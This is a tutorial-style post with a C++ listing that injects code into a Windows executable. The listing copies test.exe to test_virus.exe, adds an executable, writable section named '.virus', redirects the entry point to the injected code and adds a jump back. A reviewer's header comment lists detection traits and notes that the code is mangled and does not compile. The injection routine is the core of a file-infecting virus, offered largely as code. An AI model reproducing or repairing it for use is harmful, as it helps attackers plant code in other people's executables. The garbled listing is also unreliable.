When writing information-security programs, we often need to insert our own code into an EXE file.
How can this be implemented in code? See the code and comments below.
// NOTE(review): this listing is whitespace- and case-mangled as published
// (`# Include`, `cout <`, `Endl`, `_ ASM`, a single `=` where a comparison is
// apparently meant) and does not compile in this form. The code below is kept
// exactly as found; only this header comment is new.
//
// What the visible code does: copyfile() duplicates "test.exe" as
// "test_virus.exe"; the original is mapped read-only and its DOS and NT
// signatures are checked; a copy of the headers is edited in memory so that
// numberofsections is incremented, one extra section header is filled in
// directly after the last existing one, sizeofcode and sizeofimage are
// enlarged, and addressofentrypoint is set to the new section's
// virtualaddress; the edited headers, the bytes of viruscode() and a 5-byte
// 0xe9 jump are then written into the copy.
//
// Static traits this leaves in the output file, useful for PE triage:
//   - a final section flagged code | execute | read | write at the same time;
//   - an entry point that lies inside that final section;
//   - a section count and sizeofimage that differ from the original file;
//   - the literal section name set by the strcpy() call.
//
// NOTE(review): e_lfanew, sizeofheaders and numberofsections are read from the
// input file and used as offsets and sizes with no check against the size of
// the mapping; code that parses untrusted PE files should bound-check them.
# Include <iostream. h> # include <windows. h> # include <stdio. h> ////////////////////////////////////// //////////////////////////////////////** **************************************** * *********************** // ********* The following is the program code ** *****//********************************* **********************************////// //////////////////////////////////////// /// // void viruscode () {_ ASM {mov eax, 5} return ;} //////////////////////////////////////// ////////////////////////////////////**** **************************************** ********************** // ********* main function ****** *//************************************* ******************************////////// //////////////////////////////////////// //// // void main () {//************************************* ******************************//** * ***** First obtain the start address and end address of the program code, code length *******//***************************** **************************************// //////////////////////////////////////// /// // ******** variable description ****** * // ** dwfunbegaddr: start address of the program function // ** dwfunendaddr: end address of the program function // ** dwfuncodelen: program code length // ** dwjmpoff: the offset from the JMP area of the program function to the real entry // ** pmove: temporary pointer variable //////////////////////////////////// ///////////////////// // DWORD dwfunbegaddr, dwjmp Off, dwfunendaddr, dwfuncodelen; pbyte pmove = NULL; // ******* point to the JMP command of the program function ****** pmove = (pbyte) viruscode; cout <"the JMP address of the function is:" <(pvoid) pmove <Endl; // ******* locate the offset behind JMP ******* pmove ++; // ******* assign the offset value to the variable ******* dwjmpoff = * (pdword) pmove ); // ******* address of the next JMP command (code + 5) + offset to obtain the real entry address of the function ******** dwfunbegaddr = (DWORD) viruscode + 5 + dwjmpoff; 
cout <"jump offset of function JMP:" <(pvoid) dwjmpoff <Endl; cout <"Start Address: "<(pvoid) dwfunbegaddr <Endl; // ******* the function end address is obtained through the search below ******** // ******** first, the function entry address is assigned give the variable ****** pmove = (pbyte) dwfunbegaddr; // ******* search backward until the end ******** while (! (* (Pmove + 1) = 0xc3) & (* pmove = 0x5d) & (* (pmove-1) = 0xe5 ))) {pmove ++ ;} // ******* pmove points to the first directive of RET ******** // ********* pmove moves 5 bytes to the back, it is the JMP command placeholder ****** pmove + = 5 for the program code; dwfunendaddr = (DWORD) pmove; cout <"the end address of the Code is: "<(pvoid) dwfunendaddr <Endl; // ******* end address minus start address, get the code length ****** dwfuncodelen = dwfunendaddr-dwfunbegaddr; cout <"total code length:" <(INT) dwfuncodelen <Endl; //******************************* ************************************//** *******//***************** **************************************** ********* Handle hfile, hmapfile; lpvoid pmapoffile = NULL; //************************************** * **************************** // ********* detect files legality *******//****************************** *************************************//* * ****** open the file ******* hfile = createfile ("test.exe ", g Eneric_read, file_share_read | file_share_write, null, open_existing, file_attribute_archive, null); If (invalid_handle_value = hfile) {cout <"createfile error! "<Endl; return;} // ******** create a file ing ******* hmapfile = createfilemapping (hfile, null, page_readonly, 0, 0, null); If (! Hmapfile) {cout <"createfilemapping error! "<Endl; goto closefilehandle;} // ******* map the file to the memory ******** pmapoffile = mapviewoffile (hmapfile, file_map_read, 0, 0, 0); If (! Pmapoffile) {cout <"mapviewoffile error! 
"<Endl; goto closemaphandle;} image_dos_header * pdosheader; // ******** DOS file header ******** pdosheader = (image_dos_header *) pmapoffile; If (pdosheader-> e_magic! = Image_dos_signature) {cout <"Check dos Header error! "<Endl; goto freeviewofmap;} image_nt_headers * pntheader; // ******* detect nt file headers ******* pntheader = (image_nt_headers *) (pbyte) pdosheader + pdosheader-> e_lfanew); If (pntheader-> signature! = Image_nt_signature) {cout <"Check nt Header error! "<Endl; goto freeviewofmap ;} //************************************** * ************************ // ********* preparation **** ***//*********************************** * *************************** bool bcopy; // ******* copy the file to be added with the program code ******* bcopy = copyfile ("test.exe", "test_virus.exe ", false); If (! Bcopy) {cout <"copyfile error! "<Endl;} Handle hnewfile; // ******* open the copied file ******* hnewfile = createfile (" test_virus.exe ", generic_read | generic_write, file_share_read | file_share_write, null, open_existing, file_attribute_archive, null); If (! Hnewfile) {cout <"createfile error! "<Endl; goto freeviewofmap;} hglobal pnewfileheader; // ******* requests a memory block for the new file header, used to modify the file header information ******* pnewfileheader = globalalloc (gptr, pntheader-> optionalheader. sizeofheaders); If (! Pnewfileheader) {cout <"globalalloc error! "<Endl; goto closenewfilehandle;} // ******** use the original file header to fill this memory ******** rtlmovememory (pvoid) pnewfileheader, (pvoid) pmapoffile, pntheader-> optionalheader. 
sizeofheaders); image_nt_headers * pnewfilentheader; pnewfilentheader = (image_nt_headers *) (pbyte) pnewfileheader + pdosheader-> e_lfanew ); //////////////////////////////////////// ////////////////////////////////////**** * ** pointer information at this time ****** // ******** pmapoffile: original ing File start/* pdosheader: the DOS header of the original ing file, that is, the file starts, but the type is different./* pntheader: the original ing file's NT header // ******* pnewfileheader: Start of the new file // ******** pnewfilentheader: NT header of the new file /////////////////////////////////// //////////////////////////////////////// /*************************************** ************************ // ********* modify the Section Table of the new file information *******//****************************** * ********************************* int nsecnum; nsecnum = pnth Eader-> fileheader. numberofsections; image_section_header * plastsec, * pnewsec; // ******* locate the last section table in the original file ****** plastsec = (image_section_header *) (pbyte) pnewfilentheader + sizeof (image_nt_headers) + (nSecNum-1) * sizeof (image_section_header); // ****** pnewsec is the end of the last section table, that is, ****** pnewsec = plastsec + 1; // ******** modify the information related to the newly added section table ******* // ****** Add 1 ***** to the total number of section tables ***** pnewfilentheader-> fileheader. numberofsections ++; // ***** Modify the file offset of the new section ***** pnewsec-> pointertorawdata = plastsec-> pointertorawdata + plastsec-> sizeofrawdata; // ***** modify the file size of the new section ***** int nalignnum; nalignnum = dwfuncodelen/pnewfilentheader-> optionalheader. filealignment; If (dwfuncodelen % pnewfilentheader-> optionalheader. filealignment! = 0) {nalignnum ++;} pnewsec-> sizeofrawdata = nalignnum * pnewfilentheader-> optionalheader. 
filealignment; // ****** modify the size of all codes after alignment by Memory Page ***** nalignnum = dwfuncodelen/pnewfilentheader-> optionalheader. sectionalignment; If (dwfuncodelen % pnewfilentheader-> optionalheader. sectionalignment! = 0) {nalignnum ++;} pnewfilentheader-> optionalheader. sizeofcode + = nalignnum * pnewfilentheader-> optionalheader. sectionalignment; // ***** modify the file memory image size ***** pnewfilentheader-> optionalheader. sizeofimage + = nalignnum * pnewfilentheader-> optionalheader. sectionalignment; // ****** modify the memory offset of the new node ***** // ***** use the memory offset of the original last section to add the memory after the original last section alignment size ***** nalignnum = plastsec-> Misc. virtualsize/pnewfilentheader-> optionalheader. sectio Nalignment; If (plastsec-> Misc. virtualsize % pnewfilentheader-> optionalheader. sectionalignment! = 0) {nalignnum ++;} pnewsec-> virtualaddress = nalignnum * pnewfilentheader-> optionalheader. sectionalignment + plastsec-> virtualaddress; // ***** modify the memory size of the new section ****** pnewsec-> Misc. virtualsize = dwfuncodelen; // ***** update the attributes of the new section ***** pnewsec-> characteristics = image_scn_cnt_code | image_scn_mem_execute | image_scn_mem_read | image_scn_mem_write; // ***** update the node name ***** strcpy (char *) pnewsec-> name ,". virus "); // ****** update entry address ****** P Newfilentheader-> optionalheader. addressofentrypoint = pnewsec-> virtualaddress; bool bwrite; DWORD dwheadersize, dwwriten; dwheadersize = (DWORD) (pnewfilentheader-> optionalheader. sizeofheaders); bwrite = writefile (hnewfile, (lpvoid) pnewfileheader, dwheadersize, & dwwriten, null ); // ***** Add the program code to the file ****** DWORD dwsetfilep; // ***** locate the start of the new section in the new file ***** dwsetfilep = setfilepointer (hnewfile, pnewsec-> pointertor Awdata, null, file_begin); If (! 
Dwsetfilep) {cout <"setfilepointer error! "<Endl; goto closenewfilehandle;} // ***** write program code ***** bwrite = writefile (hnewfile, (lpvoid) dwfunbegaddr, dwfuncodelen, & dwwriten, null); If (! Bwrite) {cout <"Write virus code error! "<Endl; goto closenewfilehandle;} // ***** locate the end Of the file ****** dwsetfilep = setfilepointer (hnewfile, pnewsec-> pointertorawdata + pnewsec-> sizeofrawdata, null, file_begin); If (! Dwsetfilep) {cout <"setfilepointer end error! "<Endl; goto closenewfilehandle;} // ***** sets the end Of the file ***** if (! Setendoffile (hnewfile) {cout <"setendoffile error! "<Endl; goto closenewfilehandle;} // ******* modify the original portal address ******** pbyte pmodifyaddr; pmodifyaddr = (pbyte) pnewsec-> virtualaddress; pmodifyaddr + = dwfuncodelen; // printf ("% x \ n", pmodifyaddr); int nsub; // distance to jump nsub = (pbyte) (pntheader-> optionalheader. signature)-pmodifyaddr; DWORD dwmodifyloca; dwmodifyloca = pnewsec-> pointertorawdata; dwmodifyloca = dwmodifyloca + dwfuncodelen-5; // dwmodifyloca ++ ;//** * ** Locate the last five bytes of the program code ***** dwsetfilep = setfilepointer (hnewfile, dwmodifyloca, null, file_begin); If (! Dwsetfilep) {cout <"Modify address setfilepointer error! "<Endl; goto closenewfilehandle;} // ***** modify the JMP command ***** byte BJMP; BJMP = 0xe9; bwrite = writefile (hnewfile, & BJMP, 1, & dwwriten, null); If (! Bwrite) {cout <"Modify address writefile error! "<Endl; goto closenewfilehandle;} // ***** modify the jump address ***** bwrite = writefile (hnewfile, & nsub, 4, & dwwriten, null); If (! Bwrite) {cout <"Modify address writefile error! 
"<Endl; goto closenewfilehandle ;} //************************************** * ************************* // ********* tail scanning *** ****//********************************** * **************************** closenewfilehandle: closehandle (hnewfile); freeviewofmap: unmapviewoffile (pmapoffile); closemaphandle: closehandle (hmapfile); closefilehandle: closehandle (hfile );}